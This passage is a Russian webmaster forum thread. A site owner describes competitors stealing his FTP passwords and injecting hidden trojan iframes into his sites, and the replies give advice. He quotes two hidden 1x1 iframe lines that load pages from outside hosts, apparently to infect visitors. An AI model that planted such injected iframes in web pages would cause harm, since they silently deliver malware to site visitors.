- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Тренды маркетинга в 2024 году: мобильные продажи, углубленная аналитика и ИИ
Экспертная оценка Адмитад
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Така ситуэйшен друзья: есть у меня несколько конкурентных сайтов, в топах сидят хорошо. И вот похоже конкуренты наняли горе-ламо хакера, который любыми способами пытается меня валить.
Для начала, умудрились увести пароли доступа по ftp (упустил трояна). Я как-раз уехал в командировку и не успел дело под контроль взять - почти на всех моих сайтах прописали в индексе троян. Строка была такая:
"<iframe name="WebAlizer" src="http://silvanesti.wmastak.net/images/index.php?c=7" frameborder="0" border="0" height="1" width="1"></iframe>"
на некоторых такая
"<iframe name="WebAlizer" src="http://www.chateauxworld.com/images/index.php?c=6" frameborder="0" border="0" height="1" width="1"></iframe>"
Сцука ламер светанул все свои ip когда ломился на сервер.
Ну ладно ситуацию вернувшись поправил. Но сколько посетителей, посетивших сайт, нахватали троянов х.з.
Пароли все поменял, защиту усилил в разы.
Новое явление: ломится некий чёрт, с левой аськи, к моему хостеру так и так - почему мол не прикрываете сайт мошенника?
Типа я беру предоплату за сайты и кидаю людей ;)
Типа он попал аж на 8000 руб. (бедняга)
И указывает мыло с моего сервера, но такого названия ящика я никогда не юзал ;), якобы с которого была переписка.
Ну хостер его мягко послал - когда я вломился к ниму в асю, типа "кто ты и что за предъявы лошадинные?" типа "не пора ли в Бобруйск?" Он сказал щас сек. и исчез навсегда :)
Ну как тут жить в аких условиях ;)
"Вот уроды" (с) Брат-2
Что предложите?
забить на все это дело. Если конкуренты давят, значит хорошо работаете :)
Piligrim, приходится тратить своё драгоценное время на всяких придурков...
А куда от этого деться? Придурков много, сегодня Вы разберетесь с одним, завтра придет другой. Тем более все происходит в интернете, где вообще ничего нельзя предусмотреть и предотвратить. Сейчас его зовут Василий Петрович, у него IP из челябниской подсети, завтра его зовут Майкл, по IP он из Женевы. И все это - один и тот же человек.
Если разбираться, то разбираться серьезно, с привлечением милиции. А на привлечение милиции, предоставление доказательств, беготню по отделам и т. д. придется потратить гораздо больше времени и усилий, чем на борьбу с этими мелкими конкурентами. К сожалению.
Поэтому я считаю, что надо отмахиваться от них, как от сонных мух, и продолжать работать, не обращая внимания.
VitaDM, чтобы минимизировать потери на придурков, надо предвидеть возможные опасности, те же трояны. Регулярно бекапить сайты и т.д.
Раз вы заняли несколько позиций в топе, конечно вы кого-то разозлили. И наверное не так важно, кому именно вы перешли дорогу, главное делать это безнаказанно :). И поменьше обращать внимание на придурков.
А зачем? ;) Они того не стоят...:))
ну ip то засек? если вычисляется, звони ему домой, предупреди чтоб закупался туалетной бумагой.
"ну ip то засек" - ЭТО НЕ ПОМОЖЕТ ..
НЕ ВСЕ ИМЕЮТ выделеный IP -
parhach, в том то и дело, что это мало поможет...
У меня был похожий случай, я просто работал дальше и справедливость восторжествовала! (No Comments)
Да уж, проблема серьезная. Не хотелось бы, чтобы отечественные методы решения вопросов в бизнесе пришли на на территорию интернета. Это ведь как поджечь ларек с шавермой.